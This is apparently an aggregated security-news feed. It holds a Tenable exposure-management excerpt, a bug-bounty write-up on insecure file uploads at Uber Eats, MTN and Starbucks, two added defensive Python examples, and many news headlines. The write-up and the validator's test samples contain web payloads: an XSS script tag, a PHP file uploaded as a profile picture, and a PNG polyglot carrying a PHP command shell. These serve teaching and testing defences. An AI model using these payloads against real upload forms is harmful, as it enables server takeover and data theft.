As a security leader for an industrial real estate firm explained, the challenge is not just fixing vulnerabilities but also measuring security progress in a meaningful way. "We're trying to move to a risk-type of reporting instead of 'You fixed a thousand exposures,'" this security leader told us. "Say you have 10,000 exposures and the team knocks out 2,000 in a month. But Microsoft releases 3,000 more. Now you have 11,000. What did you actually accomplish? We have to shift to a risk approach."

The key: Risk-based exposure management ensures security teams focus on what matters most, rather than being buried under an ever-growing vulnerability backlog.

3. Staying stuck in reactive mode
Exposure management introduces a new way of thinking about cybersecurity. Instead of staying in reactive mode, responding to each new incident as it arises, continuous exposure management enables your teams to practice proactive security. You can anticipate potential attack scenarios and implement security controls to mitigate threats before attackers exploit them.

What does proactive cybersecurity look like? Here are three requirements:
- Attack path analysis to identify potential ways attackers could move laterally through your network
- Automated threat modeling to simulate potential breach scenarios
- Pre-emptive security controls such as segmentation, access restrictions and zero-trust architectures

One leader emphasized an important point: managing cyber risk requires a shift in mindset and organizational culture. "We're quite reactive," the security leader said. "And because we've been very manual, we needed a tool to help us get to the next stage. That means more automation to ease our workload so we can focus on more value-added work — like educating stakeholders to prevent repeat mistakes."

The key: By embedding exposure management practices into daily operations, you can reduce risk before attackers can take advantage of vulnerabilities.

Takeaways
The shift from vulnerability management to exposure management reflects a broader evolution in cybersecurity, from reactive security posture management to proactive risk management. Leaders are tackling the three key challenges (lack of attack surface visibility, difficulty prioritizing remediation and staying stuck in reactive mode) by embracing exposure management to build a more resilient security posture that aligns with business priorities.
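To make the prioritization logic concrete, here is an added example (not Tenable's code and not part of the blog above) that scores a handful of constructed findings on the three context signals the post names, exploitability, asset criticality and attack path, and compares a risk-weighted progress report with a raw count of fixed issues. The finding ids, hosts, scores and weights are assumptions for illustration; Tenable's own scoring formulas are not reproduced here.

```python
# Added example, not Tenable's code or the blog's own: a small risk-based
# prioritisation pass over constructed findings. The weights and the context
# fields are assumptions chosen for illustration, not a vendor's formula.
from dataclasses import dataclass
from typing import Iterable, List


@dataclass(frozen=True)
class Finding:
    fid: str                    # placeholder finding id (not a real CVE)
    asset: str
    cvss: float                 # CVSS base score, 0-10
    exploited_in_wild: bool     # "exploitability": seen in active attacks, e.g. on a KEV list
    asset_criticality: int      # 1 (disposable lab box) .. 5 (crown jewel), an ACR-style rating
    internet_exposed: bool      # reachable from outside the perimeter
    reaches_crown_jewel: bool   # attack-path analysis says this asset leads to a tier-5 asset


def risk_score(f: Finding) -> float:
    """Context-weighted score; higher means fix first. Illustrative weights."""
    score = f.cvss
    if f.exploited_in_wild:
        score *= 1.5                            # active exploitation outranks theoretical severity
    score *= 0.5 + 0.1 * f.asset_criticality    # 0.6x for ACR 1 ... 1.0x for ACR 5
    if f.internet_exposed:
        score += 2.0                            # directly reachable by attackers
    if f.reaches_crown_jewel:
        score += 2.0                            # a stepping stone on a known attack path
    return round(score, 2)


def prioritise(findings: Iterable[Finding]) -> List[Finding]:
    """Remediation order: highest context-weighted risk first."""
    return sorted(findings, key=risk_score, reverse=True)


def residual_risk(findings: Iterable[Finding]) -> float:
    """Risk-weighted backlog, the number to report instead of 'N exposures fixed'."""
    return round(sum(risk_score(f) for f in findings), 2)


# Constructed findings; ids, hosts and scores are made up for the example.
FINDINGS = [
    Finding("F1", "lab-server-03",   9.8, False, 1, False, False),
    Finding("F2", "customer-portal", 7.5, True,  5, True,  True),
    Finding("F3", "vpn-gateway",     6.5, True,  5, True,  False),
    Finding("F4", "hr-database",     8.8, False, 5, False, True),
    Finding("F5", "dev-laptop-17",   9.1, False, 2, False, False),
]


def remediation_report(findings: List[Finding], fixed_ids: Iterable[str]) -> dict:
    """Risk-based progress reporting: how much weighted risk a set of fixes removed."""
    fixed = set(fixed_ids)
    remaining = [f for f in findings if f.fid not in fixed]
    before, after = residual_risk(findings), residual_risk(remaining)
    return {"fixed": len(fixed), "risk_before": before, "risk_after": after,
            "risk_removed": round(before - after, 2)}


if __name__ == "__main__":
    for f in prioritise(FINDINGS):
        print(f"{f.fid} {f.asset:16s} CVSS {f.cvss:4.1f} -> risk {risk_score(f):5.2f}")
    # Two fixes chosen by CVSS alone versus one fix chosen by context.
    print(remediation_report(FINDINGS, ["F1", "F5"]))
    print(remediation_report(FINDINGS, ["F2"]))
```

Run as a script it prints the ranked list: the two highest CVSS scores (9.8 on an isolated lab box, 9.1 on a laptop) land at the bottom, while a 7.5 that is actively exploited on an internet-facing crown-jewel asset leads. The two reports answer the question in the quote above: fixing F1 and F5 closes two findings but removes 12.25 points of weighted risk, while fixing F2 alone removes 15.25.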
by Tenable
2025-03-31 08:30:00
Why we’re no longer doing April Fools’ DayThe internet is so filled with falsehoods that April Fools hits different these days. That's why, as a cybersecurity company, we're out.
by Malwarebytes Labs
2025-03-31 08:08:22
A week in security (March 24 – March 30)A list of topics we covered in the week of March 24 to March 30 of 2025
by Malwarebytes Labs
2025-03-31 07:00:00
Epic Fails and Heist Tales: A Red Teamer’s Journey to DeadwoodBishop Fox's Alethe Denis recaps and provides key insights from her talk, Epic Fails and Heist Tales: Red Teaming Toward Truly Tested Security, at Wild West Hackin' Fest.
by Bishop Fox
2025-03-31 06:00:00
World Backup Day 2025: A Call to Protect Your Most Valuable Asset — DataOn World Backup Day, experts urge organizations to safeguard their data from loss, cyberattacks, and costly downtime.
by ITPro Today
2025-03-31 05:48:00
Threat Context Monthly: Green Nailao & UNC3886 – Briefing for March 2025Welcome to the Threat Context Monthly blog series where we provide a comprehensive roundup of the most relevant cybersecurity news and threat information from KrakenLabs, Outpost24’s cyber threat intelligence team. Here’s what you need to know from March about espionage activities by threat actors Green Nailao and UNC3886. Spotlight threat: Green Nailao – Growing links […] The post Threat Context Monthly: Green Nailao & UNC3886 – Briefing for March 2025 appeared first on Outpost24.
by Outpost24
2025-03-31 01:22:51
How Each Pillar of the 1st Amendment is Under AttackIn an address to Congress this month, President Trump claimed he had "brought free speech back to America." But barely two months into his second term, the president has waged an unprecedented attack on the First Amendment rights of journalists, students, universities, government workers, lawyers and judges. This story explores a slew of recent actions by the Trump administration that threaten to undermine all five pillars of the First Amendment to the U.S. Constitution, which guarantees freedoms concerning speech, religion, the media, the right to assembly, and the right to petition the government and seek redress for wrongs.
by Krebs on Security
2025-03-31 00:01:24
Fake Zoom Ends in BlackSuit RansomwareKey Takeaways Case Summary This case from May 2024 started with a malicious download from a website mimicking the teleconferencing application Zoom. When visiting the website and downloading a file … Read More
by The DFIR Report
2025-03-30 21:04:35
“This isn’t ‘The Matrix'”Last weekend, Jeffrey Goldberg, editor-in-chief of The Atlantic, found himself at the center of a digital fiasco when he was unexpectedly added to a Signal group chat with 17 U.S. government officials who were discussing imminent airstrikes in Yemen. For some, the incident has raised questions about how phone numbers end up in contact lists […]
by TechCrunch
2025-03-30 15:16:34
Don't make this USB mistake! Protect your data with this discounted encrypted gadgetKingston's IronKey is one of the most secure USB drives you can buy, from a military-standard build to a complex passphrase mode.
by ZDNET Security
2025-03-30 12:03:46
Samsung Tickets Data Leak: Infostealers Strike Again in Massive Free DumpBy [Alon Gal] | March 2025 Another colossal breach fueled by infostealer malware, and this time, it’s Samsung in the crosshairs. A hacker going by the alias “GHNA” has dumped a staggering 270,000 customer tickets from Samsung Germany online, completely free of charge. The data, which appears to be sourced from samsung-shop.spectos.com, didn’t come from some […] The post Samsung Tickets Data Leak: Infostealers Strike Again in Massive Free Dump appeared first on InfoStealers.
by InfoStealers
2025-03-30 10:37:00
RESURGE Malware Exploits Ivanti Flaw with Rootkit and Web Shell FeaturesThe U.S. Cybersecurity and Infrastructure Security Agency (CISA) has shed light on a new malware called RESURGE that has been deployed as part of exploitation activity targeting a now-patched security flaw in Ivanti Connect Secure (ICS) appliances. "RESURGE contains capabilities of the SPAWNCHIMERA malware variant, including surviving reboots; however, RESURGE contains distinctive commands that
by The Hacker News
2025-03-29 18:42:28
⚠️ Crash, Cash, Repeat: The $10K File Upload Bug Hiding in Your Website
Introduction
File upload features are standard elements of contemporary web applications, giving users an interface for uploading images, documents and other shared content. The feature is at serious risk of attack if developers fail to put sufficient security controls around it. Insecure file upload mechanisms let attackers cause serious breaches, from cross-site scripting (XSS) to remote code execution (RCE) that hands them complete control of the server. This blog explains the predominant attack paths attackers use and how they think, the resulting business risk, and the safety measures developers and security teams need to implement.

🛠️ Common File Upload Attack Vectors

1. Unrestricted File Types
Risk: Allow executable file types (e.g., .php, .jsp, .html) and attackers can upload malicious scripts.
Example: A .php file uploaded as if it were an image is executed by the server, running arbitrary code.
Defense: Implement a hard allowlist (e.g., only .png, .jpg, .pdf).

2. Insecure Validation Logic
Bypass techniques:
- Header spoofing: modifying the untrusted Content-Type header (e.g., declaring a .php file as image/png).
- Magic byte spoofing: prepending a valid file signature (e.g., GIF89a) to a malicious file.
Defense: Validate both the file extension and the content (e.g., check magic bytes), and treat the client-supplied Content-Type as untrusted input.

3. Storage Misconfigurations
Risk: Storing uploads in web-accessible directories lets users execute the scripts they uploaded.
Exploit: A .php file uploaded to /uploads can be reached at https://example.com/uploads/attack.php.
Defense: Store files outside the web root or on a separate CDN/object store, and set filesystem permissions so that uploads are never executable.

4. Insecure File Metadata Handling
Threats: malware carried inside the uploaded file, unsafe filenames, and embedded metadata that leaks information.
Defense: Clean filenames, strip metadata and rename files (e.g., to a UUID).

🔍 Case Study Breakdowns

Case Study 1: Unrestricted Uploads: How a Hunter Turned a Simple File Upload into an XSS Goldmine on Uber Eats
Introduction
Picture turning a restaurant menu into a weapon. That is exactly what hunter hunt4p1zza did by exploiting a stored cross-site scripting (XSS) bug in Uber Eats that could have been catastrophic, all without a disclosed bounty for it (at least not yet). The flaw? An unrestricted file upload in restaurant onboarding, where attackers could slip in HTML and SVG files whose scripts ran on every menu view.

The Hunter's Approach
Hunt4p1zza probably started with reconnaissance, checking out the Uber Eats restaurant signup flow at https://www.ubereats.com/restaurant/en-CA/signup. Tools such as Burp Suite probably entered the picture to take apart the file upload request. The mindset? Test the edges: onboarding is functionality users return to, but it is generally audited less than customer-facing features, leaving room for mistakes.

How the Bug Was Found
The hunter likely went through steps like the following:
1. Went to the restaurant sign-up page.
2. Found the menu upload feature in onboarding.
3. Tried it with pictures and PDFs, then with HTML and SVG files.
4. Saw the uploaded file rendered in the browser because it was served with Content-Disposition: inline.
5. Uploaded a crafted HTML file carrying a JavaScript payload (e.g., <script>alert('XSS')</script>).
6. Viewed the menu and saw the script execute, confirming stored XSS.
The standout moment? Realizing that inline rendering turned a simple upload into a persistent attack.

Why They Looked There
File uploads are a bug hunter's delight, especially in onboarding flows. These areas usually prioritize functionality over security in the rush to onboard restaurants. Hunt4p1zza probably suspected that Uber Eats' onboarding path was less travelled and bet on it skipping robust validation.

Chained Bugs or Complexity
No complex chain involved. The unrestricted upload and inline rendering were the decisive factors.

Why It Matters
Stored XSS on Uber Eats would have allowed attackers to steal customers' data, take over their accounts or distribute malware, with every menu view a risk. With millions of users, the scale makes this an exceptional find, showing that even giants can neglect the basics.

Mitigation Suggestions
- Allowlist permitted file types (e.g., PDF, JPG) and reject everything else.
- Validate file contents with magic numbers, not just extensions.
- Sanitize rendered content to strip executable code.
- Serve uploads with Content-Disposition: attachment to stop inline rendering.

Links and Resources
Original Report, OWASP File Upload Cheat Sheet, Burp Suite

Case Study 2: Profile Pic to RCE: How a Hunter Exploited MTN's Career Site with Just One Upload
Introduction
This hunter landed a critical remote code execution (RCE) on MTN's careers web application; the bounty was not specified, but the impact was immense. The bug? An unvalidated file upload that let PHP files uploaded as profile pictures be executed on demand.

The Hunter's Approach
Imagine this: the hunter browses to https://careers.mtn.cm, logs in and lands on the profile update section. Using a proxy tool such as Burp Suite, they probably captured the upload requests while looking for weaknesses. The strategy? Stretch the upload feature's capabilities, since a careers site, far less visited than MTN's main pages, may have escaped security review.

How the Bug Was Found
The steps were simple but effective:
1. Signed up at https://careers.mtn.cm.
2. Logged in and opened the profile update page.
3. Uploaded a PHP file (e.g., <?php phpinfo(); ?>) as a profile picture.
4. Checked the page source and found the path to the uploaded file (e.g., https://careers.mtn.cm/en/user/images/users/-13-04-2021-20-15-16-payload.php).
5. Requested that path directly in the browser, and the server executed the PHP.
The creative twist? Pulling the file's accessible URL out of the page source, which turned a simple upload into a server takeover.

Why They Looked There
Profile picture uploads are always a target, since user-facing conveniences often escape tight review. A careers site, focused on candidates rather than core services, was a strategic choice with less scrutiny to get past.

Chained Bugs or Complexity
No chaining necessary: the lack of validation and direct file access gave RCE with no strings attached.

Why It Matters
RCE is the holy grail of vulnerabilities, giving the attacker access to the server without any barrier. On MTN's careers website, this could mean unauthorized access to confidential data, defacement of the website, or a launch pad into internal systems, an alarming sign for a telecom giant.

Mitigation Suggestions
- Limit uploads to images (JPG, PNG) via strict type checks.
- Verify file contents with magic numbers, not extensions.
- Store files outside the web root or block direct access.
- Add server-side validation to reject executable files.

Links and Resources
Original Report, OWASP Unrestricted File Upload, File Upload Security Best Practices

Case Study 3: Brewing Trouble: How a Hunter Found RCE on Starbucks' Mobile Site
Bounty Writeup: http://www.kamilonurozkaleli.com/posts/rce-on-starbucks-singapore-and-more/
Bounty Payout: $5600
Introduction
A coffee break turned into a security disaster when ko2sec stumbled upon an alleged RCE on Starbucks' mobile site; the potential losses were too serious to contemplate. The culprit? An anonymously accessible .ashx endpoint on mobile.starbucks.com.sg that accepted files with no restrictions, opening the door to server compromise.

The Hunter's Approach
Ko2sec probably began with recon, such as subdomain enumeration or directory brute-forcing with tools like Gobuster or ffuf, to locate the .ashx endpoint. Once found, they tried it with a range of file types, guessing that a mobile site might get less security attention than the main sites.
Recon: https://github.com/irsdl/iis-shortname-scanner/tree/master/ was used for blind discovery of files and directories on the IIS server behind the endpoint (the tool exploits the 8.3 short-name disclosure in IIS).

How the Bug Was Found
Here's the probable play-by-play:
1. Found the .ashx endpoint through recon on mobile.starbucks.com.sg.
2. Uploaded several files, images first and then scripts, to see how uploads were restricted.
3. Verified that the server accepted executable file formats.
4. Extended the hunt and found similar weaknesses on out-of-scope Starbucks domains.

Why They Looked There
ASHX handlers serve specific requests and can be a gold mine if misconfigured. A mobile site, a lower priority for the company, might have fewer controls, and ko2sec bet that it would pay off.

Chained Bugs or Complexity
The report suggests possible RCE but does not show it being executed. Nonetheless the unrestricted upload is a bad sign, and ko2sec's multi-domain sweep was seriously skilled work.

Why It Matters
RCE on Starbucks' mobile site could expose customer data, bring down services or worse. Finding the same problem across multiple domains elevates this to a systemic issue, a high-impact catch.

Mitigation Suggestions
- Lock down uploads to images only, with strict validation.
- Secure .ashx endpoints against code injection.
- Audit all endpoints, mobile or not, for consistency.
- Cross-check domains for shared vulnerabilities.

Links and Resources
Original Report, ASHX Handler Security, Gobuster Tool

🧠 Lessons Learned and Best Practices
Multiple layers of protection are needed against file upload attacks. Two actionable strategies follow.

Validation Defense Checklist
- Allow only the file types the application needs (e.g., .png and .jpg) and block everything else.
- Validate in three tiers: file extension, MIME type and magic byte signature, so all three agree on what the file is.
- Rename every upload to a random UUID so attackers cannot choose or predict the stored filename.
- Store files outside the web root, in non-executable locations or in access-controlled cloud storage.
- Strip metadata to remove hidden payloads and information-leaking fields.
- Reassess upload handling regularly so defenses keep up with new techniques.

Automate Security Testing
Tools to use:
- Burp Suite, for manually intercepting and modifying upload requests.
- OWASP ZAP
- Nessus
Techniques:
- Build security checks into CI/CD pipelines to catch issues before deployment.
- Run penetration tests regularly to exercise attacker tactics and surface vulnerabilities.
Together these practices and tools lower exposure to upload attacks and strengthen application security.

Conclusion
Secure file upload rests on three fundamentals: strict validation, secure storage and continuous monitoring. Organizations that understand attacker tactics and pair that knowledge with strong defenses keep their weaknesses from turning into major breaches. A single misconfigured upload feature is enough for attackers to breach a system and cause catastrophic damage. Assume nothing, test constantly and stay alert to file upload safety.
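As an added example, not code from the HACKLIDO post or from any of the programs it discusses, the following Python validator implements the checklist above (extension allowlist, Content-Type and magic-byte agreement, an active-content scan, UUID renaming, non-executable storage outside the web root, and attachment-only delivery) and runs it next to the Content-Type-only check from the "Insecure Validation Logic" section against constructed uploads shaped like the three case studies. The allowlist, size limit, temporary storage directory and sample payloads are assumptions for illustration.

```python
# Added example, not code from the HACKLIDO post or from Uber, MTN or Starbucks:
# an upload validator that applies the checklist above, run against constructed
# sample uploads shaped like the three case studies. The allowlist, size limit
# and storage directory are assumptions for the example.
import os
import re
import tempfile
import uuid
from typing import Optional

# Allowlist: extension -> (magic bytes the body must start with, canonical MIME type).
ALLOWED = {
    "png": (b"\x89PNG\r\n\x1a\n", "image/png"),
    "jpg": (b"\xff\xd8\xff", "image/jpeg"),
    "pdf": (b"%PDF-", "application/pdf"),
}
MAX_BYTES = 5 * 1024 * 1024

# Active content that can hide behind a valid header (a PHP payload appended to a
# real PNG still passes a magic-byte check). Heuristic; re-encoding images with an
# image library is the stronger version of this step.
ACTIVE_CONTENT = re.compile(rb"<\?php|<\?=|<script|<svg|<html|<iframe", re.IGNORECASE)


def naive_check(content_type: str) -> bool:
    """The 'before' logic from the header-spoofing bypass: trusts the client's Content-Type."""
    return content_type.startswith(("image/", "application/pdf"))


def validate_upload(filename: str, content_type: str, data: bytes) -> str:
    """Three-tier validation; returns the allowlisted extension or raises ValueError."""
    if len(data) > MAX_BYTES:
        raise ValueError("file too large")
    # Filenames with path separators or a leading dot are rejected outright;
    # only the final extension counts, so "avatar.php.png" must really be a PNG.
    if not filename or "/" in filename or "\\" in filename or filename.startswith("."):
        raise ValueError("unsafe filename")
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    if ext not in ALLOWED:
        raise ValueError(f"extension not allowed: {ext or '(none)'}")
    magic, mime = ALLOWED[ext]
    # Tier 2: the declared MIME type must agree with the extension (cheap, never sufficient alone).
    if content_type.split(";")[0].strip().lower() != mime:
        raise ValueError("content-type mismatch")
    # Tier 3: the bytes must carry the signature of the claimed type.
    if not data.startswith(magic):
        raise ValueError("magic bytes mismatch")
    if ACTIVE_CONTENT.search(data):
        raise ValueError("embedded active content")
    return ext


def store_upload(filename: str, content_type: str, data: bytes, storage_dir: str):
    """Validate, then write under a random UUID name in a non-executable directory
    outside the web root. Returns (path, response headers for later download)."""
    ext = validate_upload(filename, content_type, data)
    path = os.path.join(storage_dir, f"{uuid.uuid4().hex}.{ext}")
    with open(path, "wb") as fh:
        fh.write(data)
    os.chmod(path, 0o640)  # never executable
    headers = {
        "Content-Type": ALLOWED[ext][1],
        "Content-Disposition": 'attachment; filename="download.' + ext + '"',  # no inline render
        "X-Content-Type-Options": "nosniff",
    }
    return path, headers


# Constructed sample uploads (not the real payloads from the reports).
SAMPLES = {
    "uber_svg_xss":  ("menu.svg", "image/svg+xml",
                      b'<svg xmlns="http://www.w3.org/2000/svg"><script>alert(1)</script></svg>'),
    "mtn_php_shell": ("avatar.php", "image/png", b"<?php phpinfo(); ?>"),
    "double_ext":    ("avatar.php.png", "image/png", b"<?php phpinfo(); ?>"),
    "png_polyglot":  ("avatar.png", "image/png", b"\x89PNG\r\n\x1a\n" + b"<?php system($_GET['c']); ?>"),
    "traversal":     ("../../index.png", "image/png", b"\x89PNG\r\n\x1a\n"),
    "genuine_png":   ("photo.png", "image/png", b"\x89PNG\r\n\x1a\n" + b"\x00" * 64),
}


def run_samples(storage_dir: Optional[str] = None) -> dict:
    """Returns {sample: (naive verdict, hardened verdict)} for every constructed upload."""
    if storage_dir is None:
        with tempfile.TemporaryDirectory() as tmp:
            return run_samples(tmp)
    results = {}
    for name, (fn, ct, data) in SAMPLES.items():
        try:
            store_upload(fn, ct, data, storage_dir)
            hardened = "accepted"
        except ValueError as exc:
            hardened = f"rejected ({exc})"
        results[name] = ("accepted" if naive_check(ct) else "rejected", hardened)
    return results


if __name__ == "__main__":
    for name, (naive, hardened) in run_samples().items():
        print(f"{name:14s} naive: {naive:9s} hardened: {hardened}")
```

Run as a script it prints one line per sample: the naive check accepts every image/* Content-Type, so the SVG, the .php profile picture, the double-extension name, the PNG-header polyglot and the traversal filename all pass it; the hardened path rejects each for a different reason and accepts only the genuine PNG. The active-content regex is a heuristic; for images the stronger control is to decode and re-encode the file with an image library, which discards anything that is not pixel data.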
by HACKLIDO
2025-03-29 12:58:00
New Android Trojan Crocodilus Abuses Accessibility to Steal Banking and Crypto CredentialsCybersecurity researchers have discovered a new Android banking malware called Crocodilus that's primarily designed to target users in Spain and Turkey. "Crocodilus enters the scene not as a simple clone, but as a fully-fledged threat from the outset, equipped with modern techniques such as remote control, black screen overlays, and advanced data harvesting via accessibility logging,"
by The Hacker News
2025-03-29 10:30:00
Top Trump Officials’ Passwords and Personal Phone Numbers Discovered OnlinePlus: Alleged Snowflake hacker will be extradited to US, internet restrictions create an information vacuum in Myanmar, and London gets its first permanent face recognition cameras.
by WIRED Security News
2025-03-29 09:22:00
BlackLock Ransomware Exposed After Researchers Exploit Leak Site VulnerabilityIn what's an instance of hacking the hackers, threat hunters have managed to infiltrate the online infrastructure associated with a ransomware group called BlackLock, uncovering crucial information about their modus operandi in the process. Resecurity said it identified a security vulnerability in the data leak site (DLS) operated by the e-crime group that made it possible to extract
by The Hacker News
2025-03-29 00:00:00
[webapps] XWiki Standard 14.10 - Remote Code Execution (RCE)XWiki Standard 14.10 - Remote Code Execution (RCE)
by Exploit DB
2025-03-29 00:00:00
[local] Solstice Pod 6.2 - API Session Key Extraction via API EndpointSolstice Pod 6.2 - API Session Key Extraction via API Endpoint
by Exploit DB
2025-03-28 21:04:46
GSA Plans FedRAMP RevampThe General Services Administration is planning to use automation to speed up the process of determining which cloud services federal agencies are allowed to buy.
by Dark Reading
2025-03-28 20:15:41
Evilginx Tool (Still) Bypasses MFABased on the open source NGINX Web server, the malicious tool allows threat actors to steal user credentials and session tokens.
by Dark Reading
2025-03-28 18:51:00
Researchers Uncover 46 Critical Flaws in Solar Power Systems From Sungrow, Growatt, and SMACybersecurity researchers have disclosed 46 new security flaws in products from three solar power system vendors, Sungrow, Growatt, and SMA, that could be exploited by a bad actor to seize control of devices or execute code remotely, posing severe risks to electrical grids. The vulnerabilities have been collectively codenamed SUN:DOWN by Forescout Vedere Labs. "The new vulnerabilities can
by The Hacker News
2025-03-28 18:26:49
Oracle Still Denies Breach as Researchers PersistEvidence suggests an attacker gained access to the company's cloud infrastructure environment, but Oracle insists that didn't happen.
by Dark Reading
2025-03-28 18:26:37
5 Steps to Securing AI WorkloadsIn the past year alone, the number of artificial intelligence (AI) packages running in workloads grew by almost 500%. Which... The post 5 Steps to Securing AI Workloads appeared first on Sysdig.
by Sysdig
2025-03-28 17:45:05
Harmonic Security Raises $17.5M Series A to Accelerate Zero-Touch Data Protection to Market
by Dark Reading
2025-03-28 17:43:08
Stemming the Citrix Bleed Vulnerability with Darktrace’s ActiveAI Security PlatformThis blog delves into Darktrace’s investigation into the exploitation of the Citrix Bleed vulnerability on the network of a customer in late 2023. Darktrace’s Self-Learning AI ensured the customer was well equipped to track the post-compromise activity and identify affected devices.
by Darktrace
2025-03-28 17:41:56
The Price of Admission: Countering Stolen Credentials with DarktraceThis blog examines a network compromise that stemmed from the purchase of leaked credentials from the dark web. Credentials purchased from dark web marketplaces allow unauthorized access to internal systems. Such access can be used to exfiltrate data, disrupt operations, or deploy malware.
by Darktrace
2025-03-28 17:40:54
Let the Dominos Fall! SOC and IR Metrics for ROIVendors are scrambling to compare MTTD metrics laid out in the latest MITRE Engenuity ATT&CK® Evaluations. But this analysis is reductive, ignoring the fact that in cybersecurity, there are far more metrics that matter.
by Darktrace
2025-03-28 17:40:03
Following up on our Conversation: Detecting & Containing a LinkedIn Phishing Attack with DarktraceDarktrace/Email detected a phishing attack that had originated from LinkedIn, where the attacker impersonated a well known construction company to conduct a credential harvesting attack on the target. Darktrace’s ActiveAI Security Platform played a critical role in investigating the activity and initiating real-time responses that were outside the physical capability of human security teams.
by Darktrace
2025-03-28 17:39:34
Darktrace: Microsoft UK Partner of the Year 2024Darktrace continues to innovate with Microsoft in the shared mission to deliver proactive cyber protection tailored to every organization. Joint customers benefit from two distinct, complementary security approaches – combining large scale threat intelligence with enterprise-native security insights – to address the full range of email threats.
by Darktrace
2025-03-28 17:38:55
How Darktrace Detects NTLM Hash TheftExplore Darktrace's innovative methods for detecting NTLM hash theft and safeguarding your organization from cyber threats.
by Darktrace
2025-03-28 17:38:49
Traditional Data Loss Prevention Solutions Are Not Working for Most Organizations
by Dark Reading
2025-03-28 17:38:31
Investigating the Adaptive Jupyter Information StealerFind out how to safeguard your organization from the Jupyter information stealer with strategies revealed by Darktrace's in-depth investigation.
by Darktrace
2025-03-28 17:38:11
The State of AI in Cybersecurity: Understanding AI TechnologiesPart 4: This blog explores the findings from Darktrace’s State of AI Cybersecurity Report on security professionals' understanding of the different types of AI used in security programs. Get the latest insights into the evolving challenges, growing demand for skilled professionals, and the need for integrated security solutions by downloading the full report.
by Darktrace
2025-03-28 17:37:57
Understanding the WarmCookie Backdoor ThreatDiscover effective strategies for disarming the WarmCookie backdoor and securing your systems against this persistent threat.
by Darktrace
2025-03-28 17:36:29
How Darktrace Detects TeamCity Exploitation ActivityDarktrace observed the rapid exploitation of a critical vulnerability in JetBrains TeamCity (CVE-2024-27198) shortly following its public disclosure. Learn how the need for speedy detection serves to protect against supply chain attacks.
by Darktrace
2025-03-28 17:35:45
Decrypting the Matrix: How Darktrace Uncovered a KOK08 Ransomware AttackIn May 2024, a Darktrace customer was affected by KOK08, a ransomware strain commonly used by the Matrix ransomware family. Learn more about the tactics used by this ransomware case, including double extortion, and how Darktrace is able to detect and respond to such threats.
by Darktrace
2025-03-28 17:34:30
FortiClient EMS Exploited: Attack Chain & Post Exploitation TacticsRead about the methods used to exploit FortiClient EMS and the critical post-exploitation tactics that affect cybersecurity defenses.
by Darktrace
2025-03-28 17:33:56
Thread hijacking: How attackers exploit trusted conversations to infiltrate networksDiscover how thread hijacking led to a SaaS compromise on a Darktrace customer network, revealing the attacker’s tactics to infiltrate trusted conversations and potentially steal sensitive credentials. Learn about Darktrace’s autonomous detection and response actions that blocked and prevented the attack from escalating.
by Darktrace
2025-03-28 17:30:56
Triaging Triada: Understanding an Advanced Mobile Trojan and How it Targets Communication and Banking ApplicationsAndroid-based malware like Triada is increasingly targeting banking and communication apps to steal sensitive data. Triada uses sophisticated methods to evade detection, exfiltrating data to C2 servers via algorithmically generated hostnames. This underscores the need for advanced security measures to protect against these evolving threats and safeguard user data.
by Darktrace
2025-03-28 17:30:15
Phishing and Persistence: Darktrace’s Role in Defending Against a Sophisticated Account TakeoverIn a recent incident, Darktrace uncovered a M365 account takeover attempt targeting a company in the manufacturing industry. The attacker executed a sophisticated phishing attack, gaining access through the organization’s SaaS platform. This allowed the threat actor to create a new inbox rule, potentially setting the stage for future compromises.
by Darktrace
2025-03-28 17:29:57
Post-Exploitation Activities on Fortinet Devices: A Network-Based AnalysisThis blog explores recent findings from Darktrace's Threat Research team on active exploitation campaigns targeting Fortinet appliances. This analysis focuses on the September 2024 exploitation of FortiManager via CVE-2024-47575, alongside related malicious activity observed in June 2024.
by Darktrace
2025-03-28 17:29:23
Understanding the NERC-CIP015 Internal Network Security Monitoring (INSM) RequirementsThis blog provides an in-depth overview of NERC CIP-015 compliance requirements, focusing on the importance of internal network security monitoring (INSM) for electric utilities. Learn about the NERC CIP-015 standards adopting internal network security monitoring (INSM) solutions with Darktrace.
by Darktrace
2025-03-28 17:29:07
Onomastics Gymnastics: How Darktrace Detects Spoofing and Business Email Compromise in Multi-Name UsersSpanish-language naming conventions complicate identity mapping for spoofing & especially whale-spoofing detection. Darktrace / EMAIL incorporates parsing logic that allows for faithful spoofing detection in conjunction with anomaly detection.
by Darktrace
2025-03-28 17:28:49
Tactics Behind the Royal and Blacksuit RansomwareDelve into the complexities of the Royal and Blacksuit ransomware strains and their implications for cybersecurity in today’s digital landscape.
by Darktrace
2025-03-28 17:27:34
Behind the Veil: Darktrace's Detection of VPN Exploitation in SaaS EnvironmentsA recent phishing attack compromised an internal email account, but Darktrace’s advanced AI quickly intervened. By identifying unusual activity across email and SaaS environments, Darktrace uncovered the attacker’s use of VPNs to mask their location and shut down the threat.
by Darktrace
2025-03-28 17:27:06
Cloud Security: Addressing Common CISO Challenges with Advanced SolutionsThis blog highlights how Darktrace / CLOUD leverages self-learning AI to tackle critical cloud security challenges—such as misconfigurations, hybrid environment complexity, securing productivity suites, and agent fatigue—by providing unified visibility, intelligent monitoring, and real-time threat response to empower organizations with proactive protection.
by Darktrace
2025-03-28 17:27:00
CoffeeLoader Uses GPU-Based Armoury Packer to Evade EDR and Antivirus DetectionCybersecurity researchers are calling attention to a new sophisticated malware called CoffeeLoader that's designed to download and execute secondary payloads. The malware, according to Zscaler ThreatLabz, shares behavioral similarities with another known malware loader known as SmokeLoader. "The purpose of the malware is to download and execute second-stage payloads while evading
by The Hacker News
2025-03-28 17:17:21
SecurityScorecard 2025 Global Third-Party Breach Report Reveals Surge in Vendor-Driven Attacks
by Dark Reading
2025-03-28 17:16:05
Malaysia PM Refuses to Pay $10M Ransomware Demand
The attack hit the Kuala Lumpur airport over the weekend, and it remains unclear who the threat actors are and what kind of information they may have stolen.
by Dark Reading
2025-03-28 16:46:48
Vulnerability in most browsers abused in targeted attacks
A vulnerability has been found that can be exploited through every browser as long as it's running on a Windows system.
by Malwarebytes Labs
2025-03-28 16:46:29
From Containment to Remediation: Darktrace / CLOUD & Cado Reducing MTTR
Darktrace / CLOUD combines with Cado’s automated forensics capture to achieve rapid containment and deep investigative capabilities. Learn more about accelerating MTTR here.
by Darktrace
2025-03-28 16:46:22
Zimperium’s Zero-Day Detection of Android Malware Using .NET MAUI Framework
A recent report by McAfee disclosed a new Android malware campaign leveraging the .NET MAUI cross-platform framework to evade detection.
by Zimperium
2025-03-28 16:46:16
Darktrace's Early Detection of the Latest Ivanti Exploits
